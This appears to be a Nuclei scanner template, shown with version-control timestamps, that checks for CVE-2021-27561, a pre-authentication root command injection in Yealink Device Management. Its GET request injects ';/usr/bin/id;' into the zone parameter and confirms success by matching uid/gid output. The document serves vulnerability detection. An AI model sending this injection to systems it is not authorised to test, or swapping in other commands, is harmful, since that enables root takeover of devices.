2021-08-02 12:55:13 +00:00
id : CVE-2021-27561
info :
2022-05-18 20:58:07 +00:00
name : YeaLink DM 3.6.0.20 - Remote Command Injection
2021-08-02 12:55:13 +00:00
author : shifacyclewala,hackergautam
severity : critical
2022-05-18 20:58:07 +00:00
description : Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest firmware version provided by the vendor to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
2022-05-18 20:58:07 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
2022-05-18 21:10:42 +00:00
- https://ssd-disclosure.com/?p=4688
2021-10-22 09:40:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-10-22 09:40:47 +00:00
cve-id : CVE-2021-27561
2023-08-31 11:46:18 +00:00
cwe-id : CWE-78
2023-10-14 11:27:55 +00:00
epss-score : 0.97455
epss-percentile : 0.9994
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : yealink
product : device_management
tags : cve,cve2021,rce,yealink,mirai,kev
2021-08-02 12:55:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-02 12:55:13 +00:00
- method : GET
path :
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'uid'
- 'gid'
- 'groups'
2023-07-11 19:49:27 +00:00
condition : and
2021-08-02 12:55:13 +00:00
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
extractors :
- type : regex
regex :
- "(u|g)id=.*"